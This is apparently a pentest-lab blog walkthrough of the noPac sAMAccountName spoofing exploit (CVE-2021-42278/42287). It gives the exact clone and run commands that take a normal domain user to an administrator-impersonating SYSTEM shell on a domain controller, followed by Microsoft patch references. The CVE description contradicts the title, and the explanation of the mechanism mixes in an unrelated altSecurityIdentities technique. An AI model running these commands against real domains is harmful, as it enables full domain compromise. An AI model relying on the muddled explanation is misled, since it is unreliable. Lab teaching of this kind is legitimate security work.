Windows Privilege Escalation: sAMAccountName Spoofing
This post discusses how CVE-2021-42278 allows potential attackers to gain high privileged user access (domain controllers Administrator level access) via a low privileged user (any normal Domain user)
Description: Active Directory Domain Services Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-42278, CVE-2021-42282, CVE-2021-42291.
Release Date: Nov 9, 2021
Impact: Elevation of Privilege
Severity: Important
CVSS score: 8.8
Pentest Lab setup
In our lab setup, we use a Kali VM as the attacker machine, and a Windows domain controller (running on vulnerable Windows platforms) serves as the target system. This domain controller remains unpatched since November 9, 2021, which makes it vulnerable to exploitation.
Next, we will create a user with normal domain user privileges in the test Domain Controller lab setup. This step is essential to simulate a low-privileged user scenario.
To check user details on the Domain Controller, run the following command. As you can see, the user appears as a normal domain user (highlighted in red), confirming the privilege level.
net user sakshi
Exploitation
Now on your attacker system, which is Kali VM, you have to clone the exploit from the git repository provided below.
git clone https://github.com/Ridter/noPac
After cloning the repo https://github.com/Ridter/noPac, navigate to the noPac folder
cd noPac ls -al
And then execute the command
python3 noPac.py ignite.local/sakshi:'Password@1' -dc-ip 192.168.1.182 -shell --impersonate administrator -use-ldap
This CVE represents a security bypass vulnerability caused by Kerberos’s PAC confusion and the impersonation of domain controllers.
It allows potential attackers to impersonate domain controllers by requesting TGTs from Kerberos without a PAC. Consequently, the attacker impersonates a highly privileged user as soon as Kerberos issues the TGT without a PAC.
To achieve this, you configure the “altSecurityIdentities“ attribute to make the domain controller add a PAC when it receives a service ticket (ST) request using a TGT without a PAC.
This process involves modifying the altSecurityIdentities attribute of an account in a foreign domain to Kerberos:[samaccountname]@[domain] to impersonate that user.
As a result, the command execution on the attacker machine (Kali VM) displays that it has acquired "NT AUTHORITY\SYSTEM"
privileges.
Mitigation
KB5008602 – https://support.microsoft.com/en-us/topic/november-14-2021-kb5008602-os-build-17763-2305-out-of-band-8583a8a3-ebed-4829-b285-356fb5aaacd7
KB5008380 – https://support.microsoft.com/en-us/topic/kb5008380-authentication-updates-cve-2021-42287-9dafac11-e0d0-4cb8-959a-143bd0201041
References:
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42287
Author details: Amit Kishor is having 10 plus years of Network Security experience with expertise on multiple Firewall products as well as SaaS products. Contact on LinkedIn